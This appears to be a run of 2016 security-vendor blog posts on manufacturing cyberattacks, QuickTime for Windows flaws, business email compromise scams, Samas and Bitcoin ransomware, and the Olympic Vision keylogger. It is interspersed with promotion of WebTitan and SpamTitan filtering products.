Similarly, legislation has been introduced that requires organizations in the financial services industry to improve protections to keep data secure. Organizations must comply with the Gramm-Leach-Bliley Act and implement Payment Card Industry Data Security Standards. With no equivalent legislation covering the manufacturing industry, companies have not been forced to improve their cybersecurity defenses. While many organizations have implemented robust multi-layered security defenses, data security standards are higher in the healthcare and financial services verticals.
Many Manufacturing Company Cyberattacks Target Employees
With the number of manufacturing company cyberattacks increasing, cybersecurity defenses need to be improved. Many of the attacks target end users. Phishing and spear phishing emails can be a highly effective way of getting past security defenses. Employees are seen to be the weakest link in the security chain.
IBM X-Force senior threat researcher John Kuhn pointed out that servers are being targeted by hackers using phishing and spear phishing schemes. If employees can be lured onto malicious websites, vulnerabilities can be exploited and malware downloaded onto computers. From there it is a small hop to network servers.
Providing security training to staff is essential to reduce the risk of phishing attacks being successful. However, training alone is not sufficient to prevent all attacks. Software solutions should also be used to make it harder for end users to inadvertently install malware. A web filter should be implemented to prevent end users from downloading malicious software and visiting compromised websites. Web filtering can be a highly effective way of preventing attacks that target employees.
It is also essential to conduct comprehensive risk assessments to identify security vulnerabilities. All systems need to be assessed regularly. Any vulnerabilities identified need to be promptly addressed.
Two new vulnerabilities in QuickTime for Windows have recently been discovered, but a patch to address the flaws will not be issued by Apple. Apple has taken the decision to depreciate QuickTime for Windows and has advised all Windows users to uninstall the software to prevent vulnerabilities from being exploited. Apple intends to keep supporting the OSX version.
The latest vulnerabilities in QuickTime for Windows (named ZDI-16-241 and ZDI-16-242) are both heap corruption remote code execution vulnerabilities, both of which allow an attacker to write data outside of an allocated heap buffer. The vulnerabilities could be exploited remotely, although user interaction is required. In order for an attacker to exploit these vulnerabilities the target would be required to open a malicious file or visit a malicious website.
One of the vulnerabilities affects the moov atom (ZDI-16-241) while the other (ZDI-16-242) involves a flaw with atom processing. Both could allow data to be written outside of an allocated heap buffer by providing an invalid index. This would allow code to be executed in the context of Windows QuickTime player.
Latest Vulnerabilities in QuickTime for Windows Require Uninstallation of the Software
The discovery of the new vulnerabilities in QuickTime for Windows spells the end of the software for Windows users. Apple, Trend Micro, and US-CERT have all advised Windows users to uninstall QuickTime ASAP in order to stay protected.
These two new vulnerabilities are unlikely to be the last to be discovered. Leaving the software installed will place users at risk of attack. Exploits for the new vulnerabilities are not believed to have been developed yet, and no active attacks are understood to have been conducted, but it is only a matter of time before the vulnerabilities are added to exploit kits.
Whenever a software developer takes the decision to stop supporting software it means users must find alternatives. IT departments should ensure that all Windows machines have QuickTime uninstalled as soon as possible.
Apple has decided to stop support for QuickTime for Windows as most media programs no longer use QuickTime to play common formats, while HTML 5 has rendered the browser add-on obsolete.
To uninstall QuickTime for Windows, conduct a search for the uninstaller – search for “uninstall QuickTime” – or remove the program via the Windows Control Panel. Apple advises users to save the registration key if using QuickTime 7 Pro, which can be found in the “Register” tab of the program (Click Edit > Preferences).
A recent investigation by cyber security company F-Secure has revealed that corporate network cybersecurity defenses are anything but secure. The company recently assessed the cybersecurity protections in place at a large number of companies and discovered thousands of security vulnerabilities that could all too easily be exploited by hackers.
Holes in Corporate Network Cybersecurity Defenses Could be Easily Plugged
The company discovered almost 85,000 vulnerabilities in corporate network cybersecurity defenses. 7% of the 100 most common flaws were severe according to National Vulnerability Database standards, and half of those vulnerabilities could be exploited remotely by hackers. In the majority of cases patches were available to address the vulnerabilities yet they had not yet been installed.
Numerous system misconfigurations were also discovered which could potentially be exploited by attackers. Simple administrative changes could address many of the vulnerabilities discovered by the researchers.
The top ten vulnerabilities discovered by F-Secure had a severity rating of low to moderate. While these vulnerabilities may not allow hackers to gain access to corporate networks, they indicate that the organizations in question do not have strong cybersecurity defenses. If these vulnerabilities were to be discovered by hackers, it could result in the company being probed and tested. In some cases, closer inspection would reveal exploitable weaknesses.
Previous research conducted by the United States Computer Emergency Readiness Team (US-CERT) suggests that in 85% of cases, targeted cyberattacks can be prevented by applying patches. However, F-Secure’s research indicates that patch management practices are substandard in many organizations. Even when patches are applied, all too often they are not applied to all systems and vulnerabilities are allowed to remain.
If patches are not applied to all systems and vulnerabilities are allowed to persist, it is only a matter of time before corporate network cybersecurity defenses are breached.
Internet Threats Now Reaching Critical Levels
An Internet security threat report issued by Symantec earlier this month shows that the threat to corporate networks is greater than ever before. Web-borne threats have increased substantially, while three quarters of websites were determined to contain vulnerabilities that could potentially be exploited by hackers.
Furthermore, the number of zero-day vulnerabilities doubled in 2015. As soon as a vulnerability is uncovered it is rapidly incorporated into exploit kits. Those exploit kits probe for these vulnerabilities and use them to download malware and ransomware.
The threat report also confirmed that ransomware attacks increased by 35% in 2015, while spear phishing attacks increased by 55%. Attacks on large organizations are to be expected, but the report showed that even small businesses are being attacked with increasing regularity.
Unless organizations make it harder for hackers to break through their defenses, the rise in successful cyberattacks is likely to continue.
Have you recently performed a complete risk assessment to check for security vulnerabilities?
Are you certain that all security holes in your company’s defenses have been plugged?
The dramatic rise in business email scams in the past 12 months has prompted the Federal Bureau of Investigation (FBI) to issue a new warning. Companies of all sizes are being targeted with business email compromise scams which relieve companies of tens of thousands if not hundreds of thousands or millions of dollars.
The FBI warns that scammers are now going to extraordinary lengths to fool company employees into making transfers of large sums of company funds into hacker’s accounts. These attacks are far from the random email spam campaigns typically associated with email scammers. Companies are extensively researched, individual targets are identified, and carefully crafted emails are sent. A variety of social engineering techniques are employed to convince an individual in the company to make a sizeable bank transfer to the attacker’s account.
There are two main variants of these business email scams. The first involves gaining access to the email account of the CEO or a senior executive in the company. This is usually achieved with a spear phishing campaign. This phase of the attack involves researching the company and identifying a target. That target is then sent a spear phishing email in order to gain access to their email login credentials.
Once access to an email account has been gained, emails are checked to determine the style of writing used by that individual – How they sign their emails, the terminology they use, and the level of familiarity they have with the second target: An individual that manages money or makes bank transfers for the company.
An email is then sent from the executive’s email account requesting a transfer be made. Account details are supplied with a reason for urgency, and an explanation of why the request is being made.
Since the emails come from a known source within the company, and the terminology and style of the email matches those typically received by the accounts department, the transfer is often made without being queried.
Another variation on the same theme does not require access to an email account. Instead a domain name is purchased that is virtually identical to that used by the target company, often with just two letters transposed. Typically, an L in the domain name is replaced with the numeral 1, or the letter O with a zero. Goog1e.com instead of google.com for example.
These business email scams are highly effective because they take advantage of employees’ reluctance to query requests from authority figures in their organization. The emails are also crafted so as not to arouse suspicion.
Business Email Scams Have Netted Criminals Over $2.3 Billion in Three Years
Over the past three years the FBI has received complaints about business email scams from over 79 countries, and from every state in the U.S. Recently attacks have spiked in Phoenix, with other U.S. cities also targeted. Between October 2013 and February 2016, the FBI has been informed of 17,642 victims of these attacks. Over $2.3 billion in losses have been reported.
However, recently the situation has become dire. There has been a 270% increase in business email scams since January 2015, and the amounts lost in each successful attack are substantial. FBI reports that in Arizona the typical transfers requested are between £$25,000 and $75,000. With such high rewards for criminals it is no surprise that so many attacks are being conducted.
The FBI has urged companies to exercise caution and to be on high alert for these business email scams. The advice provided is to be extremely wary of any email-only request for a wire transfer, even if it comes from within the company.
To prevent these attacks, accounts department staff should verify a transfer request with the individual by phone – never by email – and should check the email address of the sender carefully. Multi-level authentication of bank transfers should also be consider3ed to reduce the risk of a successful attack.
2015 may have been the year of the healthcare data breach, but 2016 is fast becoming the year of ransomware with new strains such as Samas ransomware appearing at an alarming rate. Recently the Federal Bureau of Investigation reached out to U.S. businesses, seeking help to deal with the latest Samas ransomware threat.
Samas Ransomware Being Used to Encrypt Networks
Samas ransomware – also known as Samsa, Samsam, and MSIL – is different from many strains of ransomware that were used by cybercriminals last year. The new ransomware strain is being used to attack businesses rather than consumers. Last year, criminals were sending out ransomware randomly via spam email.
Ransom demands of 0.5-1 Bitcoin were the norm, with consumers often willing to pay to recover their files, accounts, photographs, and other important data. However, businesses hold far more valuable data. If criminals are able to infect enterprise computers and encrypt important business files, higher ransom demands can be sent. In many cases those demands have been paid.
In order to obtain large ransoms, cybercriminals need to infect networks rather than single computers. If an end user downloads ransomware onto their computer, and that ransomware has the capability to spread laterally and infect other systems, enterprises are more likely to pay to unlock the encryption. Even when viable backups exist, the complexity of some of the ransomware now being used makes paying the ransom an easier and lower cost option. Since some ransomware is capable of deleting backup files, the restoration of data may simply not be an option. Samas ransomware has been reported to delete Volume Shadow Copy Service (VSS) data.
Access to Systems is Gained by Cybercriminals Weeks Before Samas Ransomware is Deployed
The mode of action of Samas ransomware is different from other families of malicious file-encrypting software such as Locky, CryptoWall, and Cryptolocker.
Attackers are exploiting a vulnerability in the JBoss enterprise application platform to compromise an external web server. This is achieved by using a security program called JexBoss. Once access to a server has been gained, attackers mask communications using a Python based SOCKS proxy. A variety of software tools are then used to gain access to login credentials, and they in turn are used to compromise other systems and devices within an organization’s infrastructure. Several different tactics are then used to deploy Samas ransomware on numerous machines.
Several analyses of infected systems were conducted by Dell SecureWorks, which revealed attackers had compromised systems several weeks or months before the ransomware was actually deployed. Had the system compromise been detected earlier, the ransomware infections could have been avoided. Unfortunately, the initial compromise is difficult to detect, and anti-virus products are slow to detect new threats such as Samas ransomware.
The FBI issued warnings last year over the rise in popularity of Bitcoin ransomware, and a few days ago the law enforcement agency reached out to companies requesting assistance to help it tackle the threat from the latest ransomware variants, just days before the malicious software was used on MedStar Health System.
Over the last few weeks a number of healthcare institutions have reported being attacked with ransomware, and there is no telling how many companies have had corporate and customer data encrypted by attackers. Many do not like to advertise the fact they have been attacked.
While attacks on individuals only result in relatively small ransoms being paid, the same cannot be said for companies. Ransom demands of tens of thousands of dollars are issued, and many companies feel they have little alternative but to pay the ransom demand in order to recover their data.
Unfortunately for enterprises, the threat from Bitcoin ransomware is unlikely to go away any time soon. More cybercriminals are getting in on the act and attacks will continue as long as they prove to be profitable. The bad news is Bitcoin ransomware is very effective. Worse still, attacks require little technical skill and cost very little to pull off.
Bitcoin Ransomware Kits Mean Little Skill is Required to Pull Off a Successful Attack
According to a report in the Italian newspaper La Stampa, the cost of conducting a ransomware attack can be shockingly low and requires little in the way of skill. One reporter at the newspaper set out to discover just how easy it is to buy ransomware and conduct an attack. After visiting underground forums on the darknet, the researcher found a board where ransomware-as-a-service was being offered.
One poster on a Russian forum was not only offering ransomware for sale, but made it exceptionally easy for would-be cybercriminals to conduct campaigns. The purchaser would be supplied with the ransomware, distribution tools to send out the malicious file-encrypting software via email and advertising networks, and this Bitcoin ransomware service could be bought for as little as $100.
According to the article, the purchaser would be allowed to keep 85% of the ransoms that were collected, with the remaining 15% going to the seller of the service. There appears to be no shortage of takers. The hacker behind this campaign allegedly has between 300 and 400 active customers. This is only one seller. There are many more offering such a service. The campaigns may not be particularly sophisticated, but the reality is that they don’t actually need to be.
Some sellers even offer Bitcoin ransomware kits where purchasers only need to enter in their Bitcoin address for the payment of the ransom, the amount they wish to charge their victims for the security keys, and they can download everything they need, including instructions on how to run the campaign. These services are not being sold for big bucks. The sellers know they can earn considerable sums by taking a cut of the ransoms that are paid.
The standard rates being charged by attackers to supply security keys for single computer infections is between 0.5 and 1 Bitcoin – approximately $200-$425. All that is required for an attacker to make a profit is one or two victims to install the Bitcoin ransomware and pay for a security key. According to data released by Tripwire, half of American ransomware victims have ended up paying the ransom demand to recover their data.
Until law enforcement efforts to track down attackers and shut down underground forums improve, and victims stop paying ransoms, the attacks are likely to continue to increase.
What businesses need to do is to make sure they are better protected to prevent Bitcoin ransomware from being installed and to ensure they have viable backups in case ransomware does get installed on their networks.
There are a number of ways for managed service providers to increase cash flow and boost profits. Efficiency can be improved, staff productivity can be increased, better margins achieved, and new in-house products could be developed. Unfortunately, all of these are easier said than done.
The main ways to increase profits by a significant amount is to attract new customers and increase the amount each existing client is spending.
If only there was a secret ingredient that MSPs are missing that could help them help to win more business and get each client to spend more! The good news is that for many MSPs, there is such a product.
Any MSP that has yet to include a web filtering service into their product portfolio could be missing out on substantial profits.
Web Filtering – An Easy Way for MSPs to Increase Profits
Filtering the Internet is now essential for many enterprises. In certain Industries it is mandatory for companies to filter the Internet. They need to ensure sensitive data are protected and risk is effectively managed. Networks must be protected from attacks by hackers and with an increasing number of web-borne threats, Internet usage policies alone are not sufficient to keep organizations protected. Those policies need to be enforced and a web filter is the natural choice.
In some industries, education for example, it is mandatory for the Internet to be filtered. Minors must be prevented from accessing obscene website content or other material that could be harmful. Even when it is not mandatory to filter the Internet it is often desirable. Hotels, restaurants, transport networks, airports, cafes, and coffee shops are choosing to implement controls to ensure all users enjoy a safe browsing experience.
In business, productivity losses from Internet abuse can be considerable. If every employee wasted an hour each day on personal Internet use, the losses to a medium-sized company would be substantial. Some studies suggest even more time is wasted by employees each day on non-work related Internet activities.
Failure to filter the Internet can prove costly in many ways. For example, the accessing of adult content in the workplace can lead to the development of a hostile working environment, which affects morale, productivity, and can cause all manner of HR headaches. The use of torrent sites and the downloading of pirated films, music, TV shows, and software can cause organizations legal headaches as well as placing pressure on bandwidth.
Many websites are unsafe and accessing those sites places organizations at a greater risk of a malware infection. A single compromised computer can cause an incredible amount of damage. The latest ransomware attack on Medstar Health is a good example. A computer virus was inadvertently downloaded which resulted in the shutdown of the health system’s email for its entire workforce, as well as its electronic medical record system.
Hollywood Presbyterian Medical Center was attacked with ransomware and had to pay $17,000 to obtain security keys to unlock its data. It is not only healthcare organizations that are having to deal with ransomware. U.S Police Departments have been forced to pay attackers after their computers have been locked by file-encrypting software, and many organizations have fallen victim to ransomware, keyloggers, viruses, and other malicious software. These infections are a drain on productivity and take a considerable amount of time and resources to fix.
A web filtering solution can protect against web-borne threats, can be used to tackle productivity losses, and prevent illegal or unsuitable website content from being accessed. Web filtering is now less of an option for many businesses and more of a requirement. MSPs offering such a service can fine it is an easy sell and a great way to boost profits.
What to Look for in a Web Filtering Product
In order for a third-party product to be included in an MSPs existing portfolio it should have a number of features. MSPs therefore need to find a web filtering product that:
- Has generous margins
- Is easy for sales teams to sell to clients
- Has a low management overhead
- Is easy to install
- Appeals to a wide range of clients
- Can be easily incorporated into existing product offerings
- Can be easily incorporated into back-office systems
There is a product that ticks all of these boxes, and that is WebTitan Cloud.
WebTitan Cloud and WebTitan Cloud for WiFi – Ideal Web Filtering Solutions for MSPs
WebTitan Cloud is a 100% cloud-based DNS filtering solution that has been designed to be easy to implement, maintain, manage, and sell to clients. WebTitan Cloud a no-brainer for many organizations, allowing thousands of dollars to be saved.
WebTitan Cloud can help organizations increase productivity of the workforce, improve security posture to prevent malware infections, and highly competitive pricing means considerable savings can be made by organizations looking to switch web filtering providers.
WebTitan can be implemented without any effect on Internet speed, there is no need for any additional hardware, no software downloads are required. Our product is easy to use and management is straightforward and not labor-intensive.
Key Features and Benefits of WebTitan Cloud that will Appeal to MSPs
WebTitan Cloud and WebTitan Cloud for WiFi have been developed to be appealing to MSPs and their clients. To make it as easy as possible for our web filtering solutions to be incorporated into existing client packages and allow MSPs to boost profits, we offer the following:
White labelling – Allows MSPs to add their own branding and color schemes.
Hosting choices – We can host on our servers, provide private cloud hosting, or you can run our solution within your own infrastructure.
Generous margins for MSPs and highly competitive pricing – An easy way to boost profits.
Usage-based Monthly billing – Makes WebTitan Cloud more affordable for clients.
Flexible pricing – Our product can easily be included in your pricing models.
Multi-tenanted solution – Advanced customer management features makes it easy to add new clients.
API-Driven – Easy integration into back-end billing and reporting systems.
Highly scalable – Our web filtering solution is suitable for businesses of all sizes.
Excellent Support – Industry leading customer service and technical support. If you have a problem, it will be rapidly resolved.
To find out more about how easy it is to incorporate WebTitan Cloud into your existing portfolio and boost profits contact our sales team today.
Web-borne attacks on enterprises are increasing, although it is important not to forget to protect against email attacks, as shown by a recent campaign using the Olympic Vision keylogger.
Olympic Vision Keylogger Used in Recent Business Email Compromise Attacks
The attackers behind the latest campaign are using the Olympic Vision keylogger to gain access to business email accounts. Trend Micro discovered the latest campaign and was able to trace the attacks and link them to two Nigerian cybercriminals. Trend Micro determined that the current campaign has been conducted in 18 different countries including the United States.
Business email accounts contain a wealth of data, which in the wrong hands, could result in considerable damage being caused to an enterprise. However, it is not only data stored in the email accounts that hackers want to obtain. The cybercriminal gang behind the latest attacks have a different purpose. Attacks are being conducted to gain access to business email accounts to use them to send emails to account department employees instructing them to make bank transfers to the attackers’ accounts. Large transfers are often made following a business email compromise (BEC) attack.
If hackers can gain access to the email account of a senior executive, they can use that account to send messages to members of staff in the accounts or billing departments requesting transfers be made to their bank accounts. BEC is a highly effective attack strategy. If an email is sent from a CEO to the accounts department requesting an urgent transfer be made, many employees would not think twice before making the transfer as instructed.
This social engineering technique takes advantage of the fact that many employees would not question a direct request from a CEO or senior account executive. A transfer is made and the attacker receives the funds, withdraws the money, and closes the account. This often occurs before any red flags are raised, even when the transfer is for tens or hundreds of thousands of dollars.
Sophisticated Attacks Being Conducted Using Unsophisticated Malware
The Olympic Vision keylogger is not a sophisticated malware. Once installed on a device it will steal information including the computer name, Windows product keys, keystrokes, network information, clipboard text, and data saved in browsers, messaging clients, FTP clients, and email clients. It is also capable of taking screenshots.
Those data are then encrypted and are sent via email, FTP, or other means to the attacker. The Olympic Vision keylogger is capable of displaying fake error messages, and can disable computer functions to evade detection – Task Manager for example can be blocked as can registry editing tools. The Olympic Vision keylogger is capable of terminating programs that may detect it, and uses anti-emulation to prevent it running in a sandbox.
With the information collected, attackers are not only able to gain access to business email accounts, they can search for other computers, study workflows, and gather intelligence. The intel is used to construct convincing emails and ensure they are sent to individuals in the account department authorized to make bank transfers.
The attacks can be incredibly lucrative. The FBI reported recently that BEC attacks have been used by cybercriminals to obtain around $800 million dollars from businesses in the past year.
How to Protect Against BEC Attacks
There are a number of strategies that can be used to prevent BEC attacks from taking place. Software solutions can be used to prevent malware such as the Olympic Vision keylogger from being installed. SpamTitan spam filtering software can be used to block emails containing malicious attachments to prevent them from being sent to end users. If malicious emails are blocked, this places less reliance on end users not to open infected email attachments. SpamTitan can also block phishing emails, which are also used to gain access to login credentials via links to malicious websites.
Staff training is also essential. End users should receive basic security training and be advised of best practices to adopt to reduce risk. With software solutions and a culture of security awareness, the majority of attacks can be prevented.
However, it is also essential to introduce policies and procedures to prevent fraudulent bank transfers being made. A wise precaution is to introduce policies that require bank transfer requests to be authorized by a supervisor. This additional control can help to ensure fraudulent transfer requests are identified.
Any atypical request for a transfer from a senior account executive, especially those that require large sums to be transferred to accounts not previously used by the company, should be verified with the person who made the request prior to the transfer being made.
Cybercriminals are moving away from email attacks and are concentrating on web-based exploits to deliver malware. Email remains a major source of malware, but web-based attacks are now much more prevalent.
Web-Based Exploits Increasingly Used to Deliver Malware
A recent report from Palo Alto Networks showed that out of just over 68,000 malware samples collected, 25% were delivered via email, whereas 68% were delivered during web-browsing. Those figures were for known malware. When it comes to undetected samples, the figures for web-browsing rose to 90% compared to just 2% delivered via email. Undetected malware samples are those which are not detected by traditional anti-malware and anti-virus solutions.
It is easy to see why web-based exploits are being favored by cybercriminals. It takes much longer for web-based exploits to be detected by anti-virus software than email-based attacks. Palo Alto reports that it takes four times as long to detect web-based exploits as it does email-based attacks. Attackers are also able to tweak web-based malware in real-time. Email-based malware needs to be sent out and changes can only be made for each new campaign.
In the case of email-based malware attacks, the malicious software is relatively easy to detect by AV companies. They are able to give each malware sample a signature, which makes it much easier to block attacks. In the case of web-based malware this is a much harder task. The malware can be tweaked in real-time, making it harder for AV companies to capture and create a signature. A web server on which malware is hosted can be configured to re-code the malware automatically and generate many thousands of unique malware. Capturing and adding a signature to each simple takes too long.
There are many methods that can be employed to reduce the risk of malware infections from web browsing, although one of the easiest preventative steps to take is to use a web filtering solution such as WebTitan. WebTitan allows organizations to carefully control the websites that can be accessed by end users.
Palo Alto reported that HTTP proxies were frequently used in malware delivery. The blocking of HTTP proxies and web anonymizers can help to improve security posture and reduce the risk of malware downloads. P2P networks are also commonly used to deliver malware, and these can also be easily blocked with WebTitan web filtering solutions.
Social media websites are a common source of malware infections. A recent survey conducted by the Ponemon Institute revealed that 18% of respondents had experienced a malware attack via social media websites. Blocking access to social media networks, or blocking the file-transfer function of Facebook for example, can help to reduce the risk of malware downloads.
The threat landscape is constantly changing; however, by carefully controlling the actions that can be performed by end users with a web filter, the risk of malware infections can be greatly reduced.